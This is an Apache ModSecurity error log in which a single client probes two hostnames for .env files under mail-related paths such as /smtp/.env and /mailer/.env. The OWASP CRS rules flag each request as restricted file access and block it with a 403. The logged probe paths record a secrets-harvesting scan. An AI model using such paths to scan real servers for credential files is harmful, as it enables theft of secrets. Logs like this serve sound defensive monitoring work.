[Mon May 11 16:26:52.047281 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:35814] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/email/.env"] [unique_id "agHnLEWKUxpmnkK7zHx8OwAAAQk"]
[Mon May 11 16:26:52.047753 2026] [core:error] [pid 1411055:tid 1411066] [client 18.180.54.2:35814] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:52.047914 2026] [security2:error] [pid 1411055:tid 1411066] [client 18.180.54.2:35814] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/email/.env"] [unique_id "agHnLEWKUxpmnkK7zHx8OwAAAQk"]
[Mon May 11 16:26:52.084866 2026] [security2:error] [pid 1411099:tid 1411111] [client 18.180.54.2:35816] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mailer/.env"] [unique_id "agHnLA-Qm4vhlWBPlMi6TAAAAAs"]
[Mon May 11 16:26:52.085123 2026] [security2:error] [pid 1411099:tid 1411111] [client 18.180.54.2:35816] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mailer/.env"] [unique_id "agHnLA-Qm4vhlWBPlMi6TAAAAAs"]
[Mon May 11 16:26:52.085614 2026] [core:error] [pid 1411099:tid 1411111] [client 18.180.54.2:35816] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:52.085776 2026] [security2:error] [pid 1411099:tid 1411111] [client 18.180.54.2:35816] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mailer/.env"] [unique_id "agHnLA-Qm4vhlWBPlMi6TAAAAAs"]
[Mon May 11 16:26:52.753557 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:35832] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /smtp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/smtp/.env"] [unique_id "agHnLDJnyuKVXoStDha1NwAAAFM"]
[Mon May 11 16:26:52.753791 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:35832] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/smtp/.env"] [unique_id "agHnLDJnyuKVXoStDha1NwAAAFM"]
[Mon May 11 16:26:52.754344 2026] [core:error] [pid 1412074:tid 1412095] [client 18.180.54.2:35832] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:52.754492 2026] [security2:error] [pid 1412074:tid 1412095] [client 18.180.54.2:35832] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/smtp/.env"] [unique_id "agHnLDJnyuKVXoStDha1NwAAAFM"]
[Mon May 11 16:26:52.768518 2026] [security2:error] [pid 1411099:tid 1411120] [client 18.180.54.2:35846] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mail/.env"] [unique_id "agHnLA-Qm4vhlWBPlMi6VAAAABQ"]
[Mon May 11 16:26:52.768708 2026] [security2:error] [pid 1411099:tid 1411120] [client 18.180.54.2:35846] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mail/.env"] [unique_id "agHnLA-Qm4vhlWBPlMi6VAAAABQ"]
[Mon May 11 16:26:52.769247 2026] [core:error] [pid 1411099:tid 1411120] [client 18.180.54.2:35846] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:52.769398 2026] [security2:error] [pid 1411099:tid 1411120] [client 18.180.54.2:35846] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mail/.env"] [unique_id "agHnLA-Qm4vhlWBPlMi6VAAAABQ"]
[Mon May 11 16:26:53.457574 2026] [security2:error] [pid 1412074:tid 1412078] [client 18.180.54.2:35860] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/email/.env"] [unique_id "agHnLTJnyuKVXoStDha1OwAAAEI"]
[Mon May 11 16:26:53.457793 2026] [security2:error] [pid 1412074:tid 1412078] [client 18.180.54.2:35860] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/email/.env"] [unique_id "agHnLTJnyuKVXoStDha1OwAAAEI"]
[Mon May 11 16:26:53.458350 2026] [core:error] [pid 1412074:tid 1412078] [client 18.180.54.2:35860] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:53.458543 2026] [security2:error] [pid 1412074:tid 1412078] [client 18.180.54.2:35860] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/email/.env"] [unique_id "agHnLTJnyuKVXoStDha1OwAAAEI"]
[Mon May 11 16:26:53.485982 2026] [security2:error] [pid 1411055:tid 1411067] [client 18.180.54.2:35852] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/mailing/.env"] [unique_id "agHnLUWKUxpmnkK7zHx8RwAAAQo"]
[Mon May 11 16:26:53.486224 2026] [security2:error] [pid 1411055:tid 1411067] [client 18.180.54.2:35852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/mailing/.env"] [unique_id "agHnLUWKUxpmnkK7zHx8RwAAAQo"]
[Mon May 11 16:26:53.486757 2026] [core:error] [pid 1411055:tid 1411067] [client 18.180.54.2:35852] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:53.486916 2026] [security2:error] [pid 1411055:tid 1411067] [client 18.180.54.2:35852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/mailing/.env"] [unique_id "agHnLUWKUxpmnkK7zHx8RwAAAQo"]
[Mon May 11 16:26:54.147397 2026] [security2:error] [pid 1411099:tid 1411116] [client 18.180.54.2:35874] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /smtp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/smtp/.env"] [unique_id "agHnLg-Qm4vhlWBPlMi6WQAAABA"]
[Mon May 11 16:26:54.147636 2026] [security2:error] [pid 1411099:tid 1411116] [client 18.180.54.2:35874] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/smtp/.env"] [unique_id "agHnLg-Qm4vhlWBPlMi6WQAAABA"]
[Mon May 11 16:26:54.148179 2026] [core:error] [pid 1411099:tid 1411116] [client 18.180.54.2:35874] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:54.148342 2026] [security2:error] [pid 1411099:tid 1411116] [client 18.180.54.2:35874] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/smtp/.env"] [unique_id "agHnLg-Qm4vhlWBPlMi6WQAAABA"]
[Mon May 11 16:26:54.232723 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:35876] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notifications/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/notifications/.env"] [unique_id "agHnLvy_GXSWIKeli0vylwAAAIY"]
[Mon May 11 16:26:54.232965 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:35876] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/notifications/.env"] [unique_id "agHnLvy_GXSWIKeli0vylwAAAIY"]
[Mon May 11 16:26:54.233538 2026] [core:error] [pid 1411201:tid 1411252] [client 18.180.54.2:35876] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:54.233698 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:35876] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/notifications/.env"] [unique_id "agHnLvy_GXSWIKeli0vylwAAAIY"]
[Mon May 11 16:26:54.873254 2026] [security2:error] [pid 1411201:tid 1411263] [client 18.180.54.2:35878] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mailing/.env"] [unique_id "agHnLvy_GXSWIKeli0vymAAAAJE"]
[Mon May 11 16:26:54.873491 2026] [security2:error] [pid 1411201:tid 1411263] [client 18.180.54.2:35878] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mailing/.env"] [unique_id "agHnLvy_GXSWIKeli0vymAAAAJE"]
[Mon May 11 16:26:54.873990 2026] [core:error] [pid 1411201:tid 1411263] [client 18.180.54.2:35878] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:54.874142 2026] [security2:error] [pid 1411201:tid 1411263] [client 18.180.54.2:35878] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/mailing/.env"] [unique_id "agHnLvy_GXSWIKeli0vymAAAAJE"]
[Mon May 11 16:26:54.977599 2026] [security2:error] [pid 1412074:tid 1412079] [client 18.180.54.2:35894] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/notify/.env"] [unique_id "agHnLjJnyuKVXoStDha1PwAAAEM"]
[Mon May 11 16:26:54.977829 2026] [security2:error] [pid 1412074:tid 1412079] [client 18.180.54.2:35894] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/notify/.env"] [unique_id "agHnLjJnyuKVXoStDha1PwAAAEM"]
[Mon May 11 16:26:54.978386 2026] [core:error] [pid 1412074:tid 1412079] [client 18.180.54.2:35894] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:54.978546 2026] [security2:error] [pid 1412074:tid 1412079] [client 18.180.54.2:35894] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/notify/.env"] [unique_id "agHnLjJnyuKVXoStDha1PwAAAEM"]
[Mon May 11 16:26:55.609460 2026] [security2:error] [pid 1416109:tid 1416151] [client 18.180.54.2:35900] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /notifications/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/notifications/.env"] [unique_id "agHnL1V4kyjgo4bQBUhUvAAAANU"]
[Mon May 11 16:26:55.609692 2026] [security2:error] [pid 1416109:tid 1416151] [client 18.180.54.2:35900] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/notifications/.env"] [unique_id "agHnL1V4kyjgo4bQBUhUvAAAANU"]
[Mon May 11 16:26:55.610207 2026] [core:error] [pid 1416109:tid 1416151] [client 18.180.54.2:35900] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:55.610480 2026] [security2:error] [pid 1416109:tid 1416151] [client 18.180.54.2:35900] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/notifications/.env"] [unique_id "agHnL1V4kyjgo4bQBUhUvAAAANU"]
[Mon May 11 16:26:55.731764 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:35916] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sender/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/sender/.env"] [unique_id "agHnL_y_GXSWIKeli0vymwAAAJg"]
[Mon May 11 16:26:55.732004 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:35916] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/sender/.env"] [unique_id "agHnL_y_GXSWIKeli0vymwAAAJg"]
[Mon May 11 16:26:55.732502 2026] [core:error] [pid 1411201:tid 1411269] [client 18.180.54.2:35916] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:55.732671 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:35916] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/sender/.env"] [unique_id "agHnL_y_GXSWIKeli0vymwAAAJg"]
